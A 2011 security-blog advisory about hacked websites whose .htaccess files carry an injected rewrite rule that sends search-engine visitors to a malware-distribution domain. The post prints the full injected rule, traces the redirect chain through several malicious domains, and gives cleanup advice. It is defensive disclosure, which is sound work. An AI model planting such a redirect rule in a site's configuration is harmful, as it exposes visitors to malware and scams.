The Latest in IT Security

Htaccess redirection to sweepstakesandcontestsinfo dot com

14
Nov
2011


Since last week we started to see a large increase in the number of sites compromised with a .htaccess redirection to http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555.

This domain has been used to distribute malware for a while (generally through javascript injections), but only in the last few days that we started to see it being done via .htaccess.

This is what gets added to the .htaccess of the compromised sites:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]
</IfModule>

So anyone that visits the compromised sites from a search engine will get redirected (and some times have their personal computer compromised). This is what happens on the browser of the visitor:

  1. Visits compromised site by clicking from a search engine
  2. Browser is redirected to sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 (and variations
  3. Browser is redirected to http://www4.personaltr-scaner.rr.nu/?gue5mx=i%2BrOmaqtppWomd%2FXxa.. (or www3.bustdy.in or www3.strongdefenseiz.in and variations)
  4. Browser is again redirected to http://rdr.cz.cc/go.php?6&uid=7&isRedirected=1 (and other domains)

From there, it can be sent to online surveys (http://www.nic.cz.cc/redir2/?http://surveyfinde.com/d/local-job-listings.net), malware web sites, fake search engines and anywhere the attackers decide.

If your site is compromised, check your .htaccess to see if it was modified. If you are not sure, run a scan on your site here: http://sitecheck.sucuri.net

 

How are the sites getting hacked?

That’s a good question, we are seeing it being used in combination with timthumb.php attacks and on outdated Joomla/WordPress sites.

So you have make sure all of them are updated to avoid getting reinfected.

*Also, the site is not blacklisted by Google (or in any major blacklist). So it makes spreading the malware even easily.

Leave a reply


Categories

FRIDAY, MARCH 29, 2024
WHITE PAPERS

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...

Featured

Archives

Latest Comments